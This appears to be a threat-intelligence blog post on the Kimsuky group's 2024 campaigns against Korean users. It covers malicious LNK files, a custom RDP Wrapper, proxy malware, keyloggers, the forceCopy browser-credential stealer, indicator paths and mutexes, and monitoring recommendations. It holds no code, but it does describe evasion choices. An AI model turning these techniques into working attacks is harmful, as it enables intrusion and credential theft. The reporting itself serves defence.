Skip to main content

Command Palette

Search for a command to run...

Kimsuky Group Leveraging Custom RDP Wrapper In Recent Attacks

Published
5 min readView as Markdown
Kimsuky Group Leveraging Custom RDP Wrapper In Recent Attacks
F

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.

Summary

Cyble Research and Intelligence Labs (CRIL) came across an article in which a security researcher discovered that the Kimsuky threat group had evolved its attack methods in 2024. It maintained the use of LNK malware in spear-phishing campaigns while increasingly leveraging tools like RDP Wrapper and Proxy for remote system control instead of traditional backdoors.

The group continues to target Korean users by distributing malicious shortcut files disguised as document attachments, which, when executed, deploy PowerShell or Mshta to download and run additional payloads such as PebbleDash and custom-built RDP Wrappers. Additionally, Kimsuky utilizes proxy malware to bypass network restrictions, keyloggers to capture user keystrokes, and infostealers like forceCopy to extract credentials from web browsers.

Technical Detail

Threat actors are deploying spear-phishing attacks using malicious shortcut files (*.LNK) embedded with harmful commands. The inclusion of personal and company names in the file names suggests an effort to gather intelligence on specific targets.

These shortcut files are designed to appear as legitimate documents, using Office-related icons such as PDF, Excel, or Word. When executed, they trigger PowerShell or Mshta to retrieve and run additional payloads from external sources. The primary malware used to control infected systems includes PebbleDash and RDP Wrapper, which the attackers recently developed and distributed, though they remain largely unchanged from previous versions.

RDP Wrapper is an open-source utility that enables the remote desktop feature on Windows versions that do not natively support it. Threat actors have developed and deployed their own modified version of RDP Wrapper, likely to facilitate unauthorized remote access. It is suspected that they are implementing various Export functions to evade file detection by security solutions.

In addition to using PebbleDash and RDP Wrapper for system control, threat actors deploy various other malware, including Proxy, KeyLogger, and information-stealing tools.

Even if the RDP service is enabled and a user account is added, external access to an infected system remains restricted if it is within a private network. To bypass this limitation, threat actors deploy proxy malware, which acts as an intermediary between the infected system and an external network, enabling remote access via RDP.

In previous attacks of the Kimsuky group, three primary types of proxy tools were identified. The first type, associated with the mutex “MYLPROJECT,” includes a launcher that reads a configuration file from a hardcoded path (e.g., C:\Programdata\USOShared2\version.ini) and uses this information to execute the proxy tool. The second type, identified by the mutex “LPROXYMUTEX,” functions similarly to a typical proxy. The third type is a Go-based revsocks tool, a publicly available utility on GitHub.

Recently discovered proxy tools follow a similar pattern, using distinct mutexes and receiving addresses as arguments to operate.

The Kimsuky group employs PowerShell scripts for keylogging and deploys keyloggers in executable format. Previously, captured keystrokes were primarily stored in "%LOCALAPPDATA%\CursorCach.tmp" and "%LOCALAPPDATA%\CursorCache.db". However, recent variants have been observed saving logged data to "C:\Programdata\joeLog.txt" and "C:\Programdata\jLog.txt", indicating a shift in storage methods.

The Kimsuky group utilizes a tool that extracts only the key value from the “Local State” file rather than directly stealing credentials stored in web browsers. This method is likely intended to bypass security products, with the extracted key later used to decrypt and steal stored credentials.

A newly identified variant, named “forceCopy,” is designed for file copying. It operates by accepting the source file path as the first argument and the destination path as the second. Unlike traditional methods that rely on APIs like ReadFile(), this malware leverages the NTFS Parser library to read files, enhancing its stealth capabilities.

The malware is exclusively installed in web browser installation directories, suggesting that threat actors aim to evade environmental restrictions and steal browser configuration files containing stored credentials. This tactic is likely intended to bypass security products.

A notable difference from previous cases is the discovery of Injector and Loader malware. While the final payload running in memory remains unidentified, the Loader retrieves a file from "%SystemDirectory%\wbemback.dat" and loads it into memory. Meanwhile, the Injector operates by receiving parameters, such as the target process for injection.

Additionally, ReflectiveLoader has been identified among PowerShell scripts. Although obfuscated, it has been confirmed as an open-source script known as “Invoke-ReflectivePEInjection.ps1.” This script, along with other PowerShell-based malware, is installed in the "%ALLUSERSPROFILE%\USOShared\Prosd" directory.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

  1. Implement monitoring to identify and alert on the execution of base64-encoded PowerShell scripts. Attackers frequently use these scripts to obfuscate malicious activities, making detection crucial for maintaining security.

  2. Implement monitoring to detect and alert on the installation of unauthorized software, such as RDP wrappers. Observing unexpected software installations can help identify potential threat actor activities early.

  3. Set up alerts for any modifications to Windows Defender exclusion paths, particularly those adding %APPDATA% and %TEMP% directories. Attackers often modify these paths to exclude malicious files from being scanned, making it essential to detect and respond to such changes promptly.

  4. Strengthen the security of Remote Desktop Protocol (RDP) by enforcing strong authentication mechanisms, such as multi-factor authentication (MFA) and networklevel authentication (NLA). Limiting RDP access to trusted IP addresses and utilizing VPNs can also help mitigate risks.

  5. Use network segmentation to limit the spread of any potential compromises. By isolating critical systems and sensitive data, you can reduce the impact of an attacker gaining access through an RDP wrapper.

Conclusion

In 2024, the Kimsuky group's attack methods evolved. While they continued using LNK malware in spear-phishing attacks for initial breaches, they increasingly relied on tools like RDP Wrapper and Proxy to remotely control compromised systems instead of deploying traditional backdoors. The group persistently targets Korean users with spear-phishing campaigns, often disguising malware as document attachments in emails. When executed, these files grant attackers control over the victim's system.

More from this blog

F

FPT Metrodata Indonesia Cyber Security

683 posts

FPT Metrodata Indonesia (FMI) provides news, analysis & guides on cybersecurity and threat intelligence for Indonesia & Vietnam. Visit https://news.fmisec.com. FMI: https://fmisec.com